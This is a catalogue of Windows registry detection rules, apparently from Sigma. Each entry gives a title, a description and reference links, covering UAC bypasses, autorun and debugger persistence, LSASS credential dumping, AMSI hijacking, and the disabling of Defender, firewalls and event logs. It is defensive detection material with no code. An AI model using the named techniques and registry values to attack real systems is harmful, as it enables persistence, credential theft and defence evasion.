Rule to detect the configuration of the RunOnce registry key. The configured payload can be run via runonce.exe /AlternateShellStartup |
https://twitter.com/pabraeken/status/990717080805789697, https://lolbas-project.github.io/lolbas/Binaries/Runonce/ |
Shell Open Registry Keys Manipulation |
Detects the shell open key manipulation (exefile and ms-settings) used for persistence and the pattern of UAC Bypass using fodhelper.exe, computerdefaults.exe, slui.exe via registry keys (e.g. UACMe 33 or 62) |
https://github.com/hfiref0x/UACME, https://winscripting.blog/2017/05/12/first-entry-welcome-and-uac-bypass/, https://github.com/RhinoSecurityLabs/Aggressor-Scripts/tree/master/UACBypass, https://tria.ge/211119-gs7rtshcfr/behavioral2 [Lokibot sample from Nov 2021] |
Security Support Provider (SSP) Added to LSA Configuration |
Detects the addition of a SSP to the registry. Upon a reboot or API call, SSP DLLs gain access to encrypted and plaintext passwords stored in Windows.
|
https://powersploit.readthedocs.io/en/latest/Persistence/Install-SSP/, https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/data/module_source/persistence/Install-SSP.ps1#L157 |
Potential Credential Dumping Via LSASS SilentProcessExit Technique |
Detects changes to the Registry in which a monitor program gets registered to dump the memory of the lsass.exe process |
https://www.deepinstinct.com/2021/02/16/lsass-memory-dumps-are-stealthier-than-ever-before-part-2/, https://oddvar.moe/2018/04/10/persistence-using-globalflags-in-image-file-execution-options-hidden-from-autoruns-exe/ |
Sticky Key Like Backdoor Usage - Registry |
Detects the usage and installation of a backdoor that uses an option to register a malicious debugger for built-in tools that are accessible in the login screen |
https://blogs.technet.microsoft.com/jonathantrull/2016/10/03/detecting-sticky-key-backdoors/, https://bazaar.abuse.ch/sample/6f3aa9362d72e806490a8abce245331030d1ab5ac77e400dd475748236a6cc81/ |
Atbroker Registry Change |
Detects creation/modification of Assistive Technology applications and persistence with usage of 'at' |
http://www.hexacorn.com/blog/2016/07/22/beyond-good-ol-run-key-part-42/, https://lolbas-project.github.io/lolbas/Binaries/Atbroker/ |
Suspicious Run Key from Download |
Detects suspicious Run keys created by software located in Download or temporary Outlook/Internet Explorer directories |
https://app.any.run/tasks/c5bef5b7-f484-4c43-9cf3-d5c5c7839def/ |
DLL Load via LSASS |
Detects a method to load DLL via LSASS process using an undocumented Registry key |
https://blog.xpnsec.com/exploring-mimikatz-part-1/, https://twitter.com/SBousseaden/status/1183745981189427200 |
Suspicious Camera and Microphone Access |
Detects processes accessing the camera and microphone from suspicious folders |
https://medium.com/@7a616368/can-you-track-processes-accessing-the-camera-and-microphone-7e6885b37072 |
Enable Remote Connection Between Anonymous Computer - AllowAnonymousCallback |
Detects enabling of the "AllowAnonymousCallback" registry value, which allows a remote connection between computers that do not have a trust relationship. |
https://learn.microsoft.com/en-us/windows/win32/wmisdk/connecting-to-wmi-remotely-starting-with-vista |
Registry Persistence via Service in Safe Mode |
Detects the modification of the registry to allow a driver or service to persist in Safe Mode. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-33---windows-add-registry-value-to-load-service-in-safe-mode-without-network, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-34---windows-add-registry-value-to-load-service-in-safe-mode-with-network |
Add Port Monitor Persistence in Registry |
Adversaries may use port monitors to run an attacker supplied DLL during system boot for persistence or privilege escalation.
A port monitor can be set through the AddMonitor API call to set a DLL to be loaded at startup.
|
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.010/T1547.010.md |
Add Debugger Entry To AeDebug For Persistence |
Detects when an attacker adds a new "Debugger" value to the "AeDebug" key in order to achieve persistence which will get invoked when an application crashes |
https://persistence-info.github.io/Data/aedebug.html, https://learn.microsoft.com/en-us/windows/win32/debug/configuring-automatic-debugging |
Allow RDP Remote Assistance Feature |
Detects enabling of the RDP feature to allow a specific user to connect via RDP to the targeted machine |
https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1112/T1112.md |
Potential AMSI COM Server Hijacking |
Detects changes to the AMSI COM server registry key in order to disable AMSI scanning functionality. When AMSI attempts to start its COM component, it will query its registered CLSID and be returned a non-existent COM server. This causes a load failure and prevents any scanning methods from being accessed, ultimately rendering AMSI useless |
https://enigma0x3.net/2017/07/19/bypassing-amsi-via-com-server-hijacking/, https://github.com/r00t-3xp10it/hacking-material-books/blob/43cb1e1932c16ff1f58b755bc9ab6b096046853f/obfuscation/simple_obfuscation.md#amsi-comreg-bypass |
CurrentVersion Autorun Keys Modification |
Detects modification of autostart extensibility point (ASEP) in registry. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md, https://learn.microsoft.com/en-us/sysinternals/downloads/autoruns, https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d, https://oddvar.moe/2018/03/21/persistence-using-runonceex-hidden-from-autoruns-exe/ |
Common Autorun Keys Modification |
Detects modification of autostart extensibility point (ASEP) in registry. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md, https://learn.microsoft.com/en-us/sysinternals/downloads/autoruns, https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d, https://persistence-info.github.io/Data/userinitmprlogonscript.html |
Classes Autorun Keys Modification |
Detects modification of autostart extensibility point (ASEP) in registry. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md, https://learn.microsoft.com/en-us/sysinternals/downloads/autoruns, https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d |
CurrentControlSet Autorun Keys Modification |
Detects modification of autostart extensibility point (ASEP) in registry. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md, https://learn.microsoft.com/en-us/sysinternals/downloads/autoruns, https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d |
CurrentVersion NT Autorun Keys Modification |
Detects modification of autostart extensibility point (ASEP) in registry. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md, https://learn.microsoft.com/en-us/sysinternals/downloads/autoruns, https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d |
Internet Explorer Autorun Keys Modification |
Detects modification of autostart extensibility point (ASEP) in registry. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md, https://learn.microsoft.com/en-us/sysinternals/downloads/autoruns, https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d |
Office Autorun Keys Modification |
Detects modification of autostart extensibility point (ASEP) in registry. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md, https://learn.microsoft.com/en-us/sysinternals/downloads/autoruns, https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d |
Session Manager Autorun Keys Modification |
Detects modification of autostart extensibility point (ASEP) in registry. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md, https://learn.microsoft.com/en-us/sysinternals/downloads/autoruns, https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d |
System Scripts Autorun Keys Modification |
Detects modification of autostart extensibility point (ASEP) in registry. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md, https://learn.microsoft.com/en-us/sysinternals/downloads/autoruns, https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d |
WinSock2 Autorun Keys Modification |
Detects modification of autostart extensibility point (ASEP) in registry. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md, https://learn.microsoft.com/en-us/sysinternals/downloads/autoruns, https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d |
Wow6432Node CurrentVersion Autorun Keys Modification |
Detects modification of autostart extensibility point (ASEP) in registry. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md, https://learn.microsoft.com/en-us/sysinternals/downloads/autoruns, https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d, https://oddvar.moe/2018/03/21/persistence-using-runonceex-hidden-from-autoruns-exe/ |
Wow6432Node Classes Autorun Keys Modification |
Detects modification of autostart extensibility point (ASEP) in registry. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md, https://learn.microsoft.com/en-us/sysinternals/downloads/autoruns, https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d |
New BgInfo.EXE Custom DB Path Registry Configuration |
Detects setting of a new registry database value related to BgInfo configuration. Attackers can for example set this value to save the results of the commands executed by BgInfo in order to exfiltrate information. |
Internal Research |
Wow6432Node Windows NT CurrentVersion Autorun Keys Modification |
Detects modification of autostart extensibility point (ASEP) in registry. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md, https://learn.microsoft.com/en-us/sysinternals/downloads/autoruns, https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d |
New BgInfo.EXE Custom WMI Query Registry Configuration |
Detects setting of a new registry value related to BgInfo configuration, which can be abused to execute custom WMI query via "BgInfo.exe" |
Internal Research |
New BgInfo.EXE Custom VBScript Registry Configuration |
Detects setting of a new registry value related to BgInfo configuration, which can be abused to execute custom VBScript via "BgInfo.exe" |
Internal Research |
Bypass UAC Using Event Viewer |
Detects a User Account Control (UAC) bypass using Event Viewer and a relevant Windows Registry modification |
https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1548.002/T1548.002.md#atomic-test-1---bypass-uac-using-event-viewer-cmd |
Blackbyte Ransomware Registry |
Detects three different registry values that BlackByte sets to escalate privileges and begin setting the stage for lateral movement and encryption |
https://redcanary.com/blog/blackbyte-ransomware/?utm_source=twitter&utm_medium=social, https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/blackbyte-ransomware-pt-1-in-depth-analysis/ |
Bypass UAC Using DelegateExecute |
Detects a User Account Control (UAC) bypass using a fileless method |
https://learn.microsoft.com/en-us/windows/win32/api/shobjidl_core/nn-shobjidl_core-iexecutecommand, https://devblogs.microsoft.com/oldnewthing/20100312-01/?p=14623, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1548.002/T1548.002.md#atomic-test-7---bypass-uac-using-sdclt-delegateexecute |
Bypass UAC Using SilentCleanup Task |
Detects the setting of the environment variable "windir" to a non-default value.
Attackers often abuse this variable in order to trigger a UAC bypass via the "SilentCleanup" task.
The SilentCleanup task located in %windir%\system32\cleanmgr.exe is an auto-elevated task that can be abused to elevate any file with administrator privileges without prompting UAC.
|
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1548.002/T1548.002.md#atomic-test-9---bypass-uac-using-silentcleanup-task, https://www.reddit.com/r/hacking/comments/ajtrws/bypassing_highest_uac_level_windows_810/, https://www.fortinet.com/blog/threat-research/enter-the-darkgate-new-cryptocurrency-mining-and-ransomware-campaign |
Default RDP Port Changed to Non Standard Port |
Detects changes to the default RDP port.
Remote desktop is a common feature in operating systems. It allows a user to log into a remote system using an interactive session with a graphical user interface.
Microsoft refers to its implementation of the Remote Desktop Protocol (RDP) as Remote Desktop Services (RDS).
|
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.001/T1021.001.md#atomic-test-1---rdp-to-domaincontroller |
IE Change Domain Zone |
Hides the file extension through modification of the registry |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-4---add-domain-to-trusted-sites-zone, https://learn.microsoft.com/en-us/troubleshoot/developer/browsers/security-privacy/ie-security-zones-registry-entries |
Sysmon Driver Altitude Change |
Detects changes in Sysmon driver altitude value.
If the Sysmon driver is configured to load at an altitude of another registered service, it will fail to load at boot.
|
https://posts.specterops.io/shhmon-silencing-sysmon-via-driver-unload-682b5be57650, https://youtu.be/zSihR3lTf7g |
Change Winevt Channel Access Permission Via Registry |
Detects tampering with the "ChannelAccess" registry key in order to change access to a Windows event channel. |
https://app.any.run/tasks/77b2e328-8f36-46b2-b2e2-8a80398217ab/, https://learn.microsoft.com/en-us/windows/win32/api/winevt/, https://itconnect.uw.edu/tools-services-support/it-systems-infrastructure/msinf/other-help/understanding-sddl-syntax/ |
Running Chrome VPN Extensions via the Registry 2 VPN Extension |
Detects the installation of two Chrome VPN extensions via the registry. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1133/T1133.md#atomic-test-1---running-chrome-vpn-extensions-via-the-registry-2-vpn-extension |
ClickOnce Trust Prompt Tampering |
Detects changes to the ClickOnce trust prompt registry key in order to enable an installation from different locations such as the Internet. |
https://posts.specterops.io/less-smartscreen-more-caffeine-ab-using-clickonce-for-trusted-code-execution-1446ea8051c5, https://learn.microsoft.com/en-us/visualstudio/deployment/how-to-configure-the-clickonce-trust-prompt-behavior |
Potential CobaltStrike Service Installations - Registry |
Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or performs lateral movement.
|
https://www.sans.org/webcasts/tech-tuesday-workshop-cobalt-strike-detection-log-analysis-119395 |
COM Hijack via Sdclt |
Detects changes to 'HKCU\Software\Classes\Folder\shell\open\command\DelegateExecute' |
http://blog.sevagas.com/?Yet-another-sdclt-UAC-bypass, https://www.exploit-db.com/exploits/47696 |
CrashControl CrashDump Disabled |
Detects disabling the CrashDump per registry (as used by HermeticWiper) |
https://www.sentinelone.com/labs/hermetic-wiper-ukraine-under-attack/ |
Service Binary in Suspicious Folder |
Detects the creation of a service with a service binary located in a suspicious directory |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md |
Custom File Open Handler Executes PowerShell |
Detects the abuse of a custom file open handler to execute PowerShell |
https://news.sophos.com/en-us/2022/02/01/solarmarker-campaign-used-novel-registry-changes-to-establish-persistence/?cmp=30728 |
Potential Registry Persistence Attempt Via DbgManagedDebugger |
Detects the addition of the "Debugger" value to the "DbgManagedDebugger" key in order to achieve persistence; the configured debugger will get invoked when an application crashes |
https://www.hexacorn.com/blog/2013/09/19/beyond-good-ol-run-key-part-4/, https://github.com/last-byte/PersistenceSniper |
Windows Defender Exclusions Added - Registry |
Detects the setting of Windows Defender exclusions |
https://twitter.com/_nullbind/status/1204923340810543109 |
Potentially Suspicious Desktop Background Change Via Registry |
Detects registry value settings that would replace the user's desktop background.
This is a common technique used by malware to change the desktop background to a ransom note or other image.
|
https://www.attackiq.com/2023/09/20/emulating-rhysida/, https://research.checkpoint.com/2023/the-rhysida-ransomware-activity-analysis-and-ties-to-vice-society/, https://www.trendmicro.com/en_us/research/23/h/an-overview-of-the-new-rhysida-ransomware.html, https://www.virustotal.com/gui/file/a864282fea5a536510ae86c77ce46f7827687783628e4f2ceb5bf2c41b8cd3c6/behavior, https://admx.help/?Category=Windows_10_2016&Policy=Microsoft.Policies.WindowsDesktop::Wallpaper, https://admx.help/?Category=Windows_10_2016&Policy=Microsoft.Policies.ControlPanelDisplay::CPL_Personalization_NoDesktopBackgroundUI |
Antivirus Filter Driver Disallowed On Dev Drive - Registry |
Detects activity that indicates a user disabling the ability of the antivirus mini-filter to inspect a "Dev Drive".
|
https://twitter.com/0gtweet/status/1720419490519752955 |
Hypervisor Enforced Code Integrity Disabled |
Detects changes to the HypervisorEnforcedCodeIntegrity registry key and the "Enabled" value being set to 0 in order to disable the Hypervisor Enforced Code Integrity feature. This allows an attacker to load unsigned and untrusted code into the kernel.
|
https://www.welivesecurity.com/2023/03/01/blacklotus-uefi-bootkit-myth-confirmed/, https://github.com/redcanaryco/atomic-red-team/blob/04e487c1828d76df3e834621f4f893ea756d5232/atomics/T1562.001/T1562.001.md#atomic-test-43---disable-hypervisor-enforced-code-integrity-hvci |
Hypervisor Enforced Paging Translation Disabled |
Detects changes to the "DisableHypervisorEnforcedPagingTranslation" registry value, where it is set to "1" in order to disable the Hypervisor Enforced Paging Translation feature.
|
https://twitter.com/standa_t/status/1808868985678803222, https://github.com/AaLl86/WindowsInternals/blob/070dc4f317726dfb6ffd2b7a7c121a33a8659b5e/Slides/Hypervisor-enforced%20Paging%20Translation%20-%20The%20end%20of%20non%20data-driven%20Kernel%20Exploits%20(Recon2024).pdf |
DHCP Callout DLL Installation |
Detects the installation of a Callout DLL via the CalloutDlls and CalloutEnabled parameters in the registry, which can be used to execute code in the context of the DHCP server (restart required) |
https://blog.3or.de/mimilib-dhcp-server-callout-dll-injection.html, https://technet.microsoft.com/en-us/library/cc726884(v=ws.10).aspx, https://msdn.microsoft.com/de-de/library/windows/desktop/aa363389(v=vs.85).aspx |
Disable Exploit Guard Network Protection on Windows Defender |
Detects disabling Windows Defender Exploit Guard Network Protection |
https://www.tenforums.com/tutorials/105533-enable-disable-windows-defender-exploit-protection-settings.html |
Disable Administrative Share Creation at Startup |
Administrative shares are hidden network shares created by Microsoft Windows NT operating systems that grant system administrators remote access to every disk volume on a network-connected system |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.005/T1070.005.md#atomic-test-4---disable-administrative-share-creation-at-startup |
Disabled Windows Defender Eventlog |
Detects the disabling of the Windows Defender eventlog as seen in relation to Lockbit 3.0 infections |
https://twitter.com/WhichbufferArda/status/1543900539280293889/photo/2 |
Disable PUA Protection on Windows Defender |
Detects disabling Windows Defender PUA protection |
https://www.tenforums.com/tutorials/32236-enable-disable-microsoft-defender-pua-protection-windows-10-a.html |
Disable Tamper Protection on Windows Defender |
Detects disabling Windows Defender Tamper Protection |
https://www.tenforums.com/tutorials/123792-turn-off-tamper-protection-microsoft-defender-antivirus.html |
Potential AutoLogger Sessions Tampering |
Detects tampering with AutoLogger trace sessions, a technique used by attackers to disable logging |
https://twitter.com/MichalKoczwara/status/1553634816016498688, https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/, https://i.blackhat.com/EU-21/Wednesday/EU-21-Teodorescu-Veni-No-Vidi-No-Vici-Attacks-On-ETW-Blind-EDRs.pdf |
Disable Microsoft Defender Firewall via Registry |
Adversaries may disable or modify system firewalls in order to bypass controls limiting network usage |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.004/T1562.004.md#atomic-test-2---disable-microsoft-defender-firewall-via-registry |
Disable Internal Tools or Feature in Registry |
Detects registry modifications that change features of internal Windows tools (malware like Agent Tesla uses this technique) |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md, https://www.mandiant.com/resources/unc2165-shifts-to-evade-sanctions, https://blogs.vmware.com/security/2022/11/batloader-the-evasive-downloader-malware.html, https://www.malwarebytes.com/blog/detections/pum-optional-nodispbackgroundpage, https://www.malwarebytes.com/blog/detections/pum-optional-nodispcpl |
Disable Macro Runtime Scan Scope |
Detects tampering with the MacroRuntimeScanScope registry key to disable runtime scanning of enabled macros |
https://www.microsoft.com/en-us/security/blog/2018/09/12/office-vba-amsi-parting-the-veil-on-malicious-macros/, https://admx.help/?Category=Office2016&Policy=office16.Office.Microsoft.Policies.Windows::L_MacroRuntimeScanScope, https://github.com/S3cur3Th1sSh1t/OffensiveVBA/blob/28cc6a2802d8176195ac19b3c8e9a749009a82a3/src/AMSIbypasses.vba |
Disable Privacy Settings Experience in Registry |
Detects registry modifications that disable Privacy Settings Experience |
https://github.com/redcanaryco/atomic-red-team/blob/9e5b12c4912c07562aec7500447b11fa3e17e254/atomics/T1562.001/T1562.001.md |
Disable Windows Security Center Notifications |
Detects setting UseActionCenterExperience to 0 to disable Windows Security Center notifications |
https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1112/T1112.md |
Registry Disable System Restore |
Detects the modification of the registry to disable System Restore on the computer |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-9---disable-system-restore-through-registry |
Windows Defender Service Disabled - Registry |
Detects when an attacker or tool disables the Windows Defender service (WinDefend) via the registry |
https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/, https://gist.github.com/anadr/7465a9fde63d41341136949f14c21105 |
Disable Windows Firewall by Registry |
Detects setting EnableFirewall to 0 to disable the Windows firewall |
https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1562.004/T1562.004.md |
Disable Windows Event Logging Via Registry |
Detects tampering with the "Enabled" registry key in order to disable Windows logging of a Windows event channel |
https://twitter.com/WhichbufferArda/status/1543900539280293889, https://github.com/DebugPrivilege/CPP/blob/c39d365617dbfbcb01fffad200d52b6239b2918c/Windows%20Defender/RestoreDefenderConfig.cpp |
Add DisallowRun Execution to Registry |
Detects setting DisallowRun to 1 to prevent users from running specific programs |
https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1112/T1112.md |
Persistence Via Disk Cleanup Handler - Autorun |
Detects when an attacker modifies values of the Disk Cleanup Handler in the registry to achieve persistence via autorun.
The disk cleanup manager is part of the operating system.
It displays the dialog box […] The user has the option of enabling or disabling individual handlers by selecting or clearing their check box in the disk cleanup manager's UI.
Although Windows comes with a number of disk cleanup handlers, they aren't designed to handle files produced by other applications.
Instead, the disk cleanup manager is designed to be flexible and extensible by enabling any developer to implement and register their own disk cleanup handler.
Any developer can extend the available disk cleanup services by implementing and registering a disk cleanup handler.
|
https://persistence-info.github.io/Data/diskcleanuphandler.html, https://www.hexacorn.com/blog/2018/09/02/beyond-good-ol-run-key-part-86/ |
DNS-over-HTTPS Enabled by Registry |
Detects when a user enables DNS-over-HTTPS.
This can be used to hide internet activity or to hide the process of exfiltrating data.
With this enabled, organizations lose visibility into data such as query type, response and originating IP that are used to identify bad actors.
|
https://www.tenforums.com/tutorials/151318-how-enable-disable-dns-over-https-doh-microsoft-edge.html, https://github.com/elastic/detection-rules/issues/1371, https://chromeenterprise.google/policies/?policy=DnsOverHttpsMode, https://admx.help/HKLM/Software/Policies/Mozilla/Firefox/DNSOverHTTPS |
New DNS ServerLevelPluginDll Installed |
Detects the installation of a DNS plugin DLL via the ServerLevelPluginDll parameter in the registry, which can be used to execute code in the context of the DNS server (restart required) |
https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83, https://blog.3or.de/hunting-dns-server-level-plugin-dll-injection.html |
ETW Logging Disabled In .NET Processes - Sysmon Registry |
Detects potential adversaries stopping ETW providers from recording loaded .NET assemblies. |
https://twitter.com/_xpn_/status/1268712093928378368, https://social.msdn.microsoft.com/Forums/vstudio/en-US/0878832e-39d7-4eaf-8e16-a729c4c40975/what-can-i-use-e13c0d23ccbc4e12931bd9cc2eee27e4-for?forum=clr, https://github.com/dotnet/runtime/blob/ee2355c801d892f2894b0f7b14a20e6cc50e0e54/docs/design/coreclr/jit/viewing-jit-dumps.md#setting-configuration-variables, https://github.com/dotnet/runtime/blob/f62e93416a1799aecc6b0947adad55a0d9870732/src/coreclr/src/inc/clrconfigvalues.h#L35-L38, https://github.com/dotnet/runtime/blob/7abe42dc1123722ed385218268bb9fe04556e3d3/src/coreclr/src/inc/clrconfig.h#L33-L39, https://github.com/dotnet/runtime/search?p=1&q=COMPlus_&unscoped_q=COMPlus_, https://bunnyinside.com/?term=f71e8cb9c76a, http://managed670.rssing.com/chan-5590147/all_p1.html, https://github.com/dotnet/runtime/blob/4f9ae42d861fcb4be2fcd5d3d55d5f227d30e723/docs/coding-guidelines/clr-jit-coding-conventions.md#1412-disabling-code, https://blog.xpnsec.com/hiding-your-dotnet-complus-etwenabled/, https://i.blackhat.com/EU-21/Wednesday/EU-21-Teodorescu-Veni-No-Vidi-No-Vici-Attacks-On-ETW-Blind-EDRs.pdf |
Directory Service Restore Mode (DSRM) Registry Value Tampering |
Detects changes to "DsrmAdminLogonBehavior" registry value.
During a Domain Controller (DC) promotion, administrators create a Directory Services Restore Mode (DSRM) local administrator account with a password that rarely changes. The DSRM account is an "Administrator" account that logs in with the DSRM mode when the server is booting up to restore AD backups or recover the server from a failure.
Attackers could abuse the DSRM account to maintain their persistence and access to the organization's Active Directory.
If the "DsrmAdminLogonBehavior" value is set to "0", the administrator account can only be used if the DC starts in DSRM.
If the "DsrmAdminLogonBehavior" value is set to "1", the administrator account can only be used if the local AD DS service is stopped.
If the "DsrmAdminLogonBehavior" value is set to "2", the administrator account can always be used.
|
https://adsecurity.org/?p=1785, https://www.sentinelone.com/blog/detecting-dsrm-account-misconfigurations/, https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/dsrm-credentials |
Periodic Backup For System Registry Hives Enabled |
Detects the enabling of the "EnablePeriodicBackup" registry value. Once enabled, the OS will back up System registry hives on restarts to the "C:\Windows\System32\config\RegBack" folder. Windows creates a "RegIdleBackup" task to manage subsequent backups.
Registry backup was a default behavior on Windows and was disabled as of "Windows 10, version 1803".
|
https://learn.microsoft.com/en-us/troubleshoot/windows-client/installing-updates-features-roles/system-registry-no-backed-up-regback-folder |
Windows Recall Feature Enabled - Registry |
Detects the enabling of the Windows Recall feature via registry manipulation. Windows Recall can be enabled by setting the value of "DisableAIDataAnalysis" to "0".
Adversaries may enable Windows Recall as part of post-exploitation discovery and collection activities.
This rule assumes that Recall is already explicitly disabled on the host, and subsequently enabled by the adversary.
|
https://learn.microsoft.com/en-us/windows/client-management/manage-recall, https://learn.microsoft.com/en-us/windows/client-management/mdm/policy-csp-windowsai#disableaidataanalysis |
Enabling COR Profiler Environment Variables |
Detects .NET Framework CLR and .NET Core CLR "cor_enable_profiling" and "cor_profiler" variables being set and configured. |
https://twitter.com/jamieantisocial/status/1304520651248668673, https://www.slideshare.net/JamieWilliams130/started-from-the-bottom-exploiting-data-sources-to-uncover-attck-behaviors, https://www.sans.org/cyber-security-summit/archives, https://learn.microsoft.com/en-us/dotnet/core/runtime-config/debugging-profiling |
Potential EventLog File Location Tampering |
Detects tampering with the EventLog service "file" key in order to change the default location of an Evtx file. This technique is used to tamper with log collection and alerting |
https://learn.microsoft.com/en-us/windows/win32/eventlog/eventlog-key |
Scripted Diagnostics Turn Off Check Enabled - Registry |
Detects enabling TurnOffCheck, which can be used to bypass defenses against the MSDT Follina vulnerability |
https://twitter.com/wdormann/status/1537075968568877057?s=20&t=0lr18OAnmAGoGpma6grLUw |
Suspicious Application Allowed Through Exploit Guard |
Detects applications being added to the "allowed applications" list of exploit guard in order to bypass controlled folder settings |
https://www.microsoft.com/security/blog/2017/10/23/windows-defender-exploit-guard-reduce-the-attack-surface-against-next-generation-malware/ |
Change User Account Associated with the FAX Service |
Detects a change of the user account associated with the FAX service to avoid the escalation problem. |
https://twitter.com/dottor_morte/status/1544652325570191361, https://raw.githubusercontent.com/RiccardoAncarani/talks/master/F-Secure/unorthodox-lateral-movement.pdf |
Change the Fax Dll |
Detects possible persistence via a Fax DLL that is loaded when the service restarts |
https://twitter.com/dottor_morte/status/1544652325570191361, https://raw.githubusercontent.com/RiccardoAncarani/talks/master/F-Secure/unorthodox-lateral-movement.pdf |
New File Association Using Exefile |
Detects the abuse of the exefile handler in new file association. Used for bypass of security products. |
https://twitter.com/mrd0x/status/1461041276514623491 |
Add Debugger Entry To Hangs Key For Persistence |
Detects when an attacker adds a new "Debugger" value to the "Hangs" key in order to achieve persistence which will get invoked when an application crashes |
https://persistence-info.github.io/Data/wer_debugger.html, https://www.hexacorn.com/blog/2019/09/20/beyond-good-ol-run-key-part-116/ |
Persistence Via Hhctrl.ocx |
Detects when an attacker modifies the "hhctrl" registry value to point to a custom binary |
https://persistence-info.github.io/Data/hhctrl.html, https://www.hexacorn.com/blog/2018/04/23/beyond-good-ol-run-key-part-77/ |
Registry Modification to Hidden File Extension |
Hides the file extension through modification of the registry |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-1---modify-registry-of-current-user-profile---cmd, https://unit42.paloaltonetworks.com/ransomware-families/, https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?name=TrojanSpy%3aMSIL%2fHakey.A |
